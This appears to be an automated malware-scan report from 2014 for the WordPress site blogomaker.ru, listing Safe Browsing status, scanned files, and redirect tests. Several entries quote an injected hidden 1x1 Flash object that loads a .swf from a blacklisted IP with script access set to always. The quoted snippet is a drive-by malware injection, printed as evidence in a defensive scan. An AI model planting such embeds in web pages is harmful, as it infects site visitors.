Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blogomaker.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://blogomaker.ru/ | 200 OK Content-Length: 51102 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3155 bytes skipped]... âÐ°Р Ð Р вÐ¦Р РÐÐ ÐÐ âСâ¢</a><br> Р РРÐвÐâÐ Â Ð ÐР вÐÑР РРâÐµР Ð РÑвÐÂР РРÐвÐÑÐ Â Ð ÐР СâÐ Â Ð ÐÐ ÐÐ âСâ¢Ð  Ð РâÐ°Р Ð Р вÐ Р Ð РâÐ»Р Ð РâÐµР Ð Р вÐ¦Р Ð Рâа JivoSite</div> <!-- {/literal} END JIVOSITE CODE --> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574 ...[410 bytes skipped]... | ||
http://blogomaker.ru/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0.1 | 200 OK Content-Length: 33 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://blogomaker.ru//ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 12 Dec 2014 21:47:13 GMT Pragma: no-cache Location: http://blogomaker.ru/ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://blogomaker.ru/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://blogomaker.ru/ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1/ | 404 Not Found Content-Length: 50743 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3162 bytes skipped]... âÐ°Р Ð Р вÐ¦Р РÐÐ ÐÐ âСâ¢</a><br> Р РРÐвÐâÐ Â Ð ÐР вÐÑР РРâÐµР Ð РÑвÐÂР РРÐвÐÑÐ Â Ð ÐР СâÐ Â Ð ÐÐ ÐÐ âСâ¢Ð  Ð РâÐ°Р Ð Р вÐ Р Ð РâÐ»Р Ð РâÐµР Ð Р вÐ¦Р Ð Рâа JivoSite</div> <!-- {/literal} END JIVOSITE CODE --> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574 ...[408 bytes skipped]... | ||
http://blogomaker.ru/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0.1 | 200 OK Content-Length: 24995 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0.1 | 200 OK Content-Length: 5337 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0.1 | 200 OK Content-Length: 891 Content-Type: application/x-javascript | clean |
http://blogomaker.ru//ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 12 Dec 2014 21:47:14 GMT Pragma: no-cache Location: http://blogomaker.ru/ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://blogomaker.ru/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://blogomaker.ru/ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0/ | 404 Not Found Content-Length: 50785 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3162 bytes skipped]... âÐ°Р Ð Р вÐ¦Р РÐÐ ÐÐ âСâ¢</a><br> Р РРÐвÐâÐ Â Ð ÐР вÐÑР РРâÐµР Ð РÑвÐÂР РРÐвÐÑÐ Â Ð ÐР СâÐ Â Ð ÐÐ ÐÐ âСâ¢Ð  Ð РâÐ°Р Ð Р вÐ Р Ð РâÐ»Р Ð РâÐµР Ð Р вÐ¦Р Ð Рâа JivoSite</div> <!-- {/literal} END JIVOSITE CODE --> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574 ...[408 bytes skipped]... | ||
http://blogomaker.ru//ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 12 Dec 2014 21:47:15 GMT Pragma: no-cache Location: http://blogomaker.ru/ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://blogomaker.ru/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://blogomaker.ru/ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0/ | 404 Not Found Content-Length: 50743 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3162 bytes skipped]... âÐ°Р Ð Р вÐ¦Р РÐÐ ÐÐ âСâ¢</a><br> Р РРÐвÐâÐ Â Ð ÐР вÐÑР РРâÐµР Ð РÑвÐÂР РРÐвÐÑÐ Â Ð ÐР СâÐ Â Ð ÐÐ ÐÐ âСâ¢Ð  Ð РâÐ°Р Ð Р вÐ Р Ð РâÐ»Р Ð РâÐµР Ð Р вÐ¦Р Ð Рâа JivoSite</div> <!-- {/literal} END JIVOSITE CODE --> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574 ...[408 bytes skipped]... | ||
http://blogomaker.ru/wp-content/plugins/lightbox-3/lightbox.js?ver=1.8 | 200 OK Content-Length: 21338 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=4.0.1 | 200 OK Content-Length: 890 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/themes/minimal/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 8417 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/themes/minimal/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/x-javascript | clean |
http://blogomaker.ru/wp-content/themes/minimal/js/jquery.jcarousel.min.js | 200 OK Content-Length: 15650 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blogomaker.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 12 Dec 2014 21:47:10 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://blogomaker.ru/>; rel=shortlink
X-Pingback: http://blogomaker.ru/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: blogomaker.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 12 Dec 2014 21:47:10 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://blogomaker.ru/>; rel=shortlink
X-Pingback: http://blogomaker.ru/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: blogomaker.ru
Referer: http://www.google.com/search?q=blogomaker.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blogomaker.ru
Referer: http://www.google.com/search?q=blogomaker.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.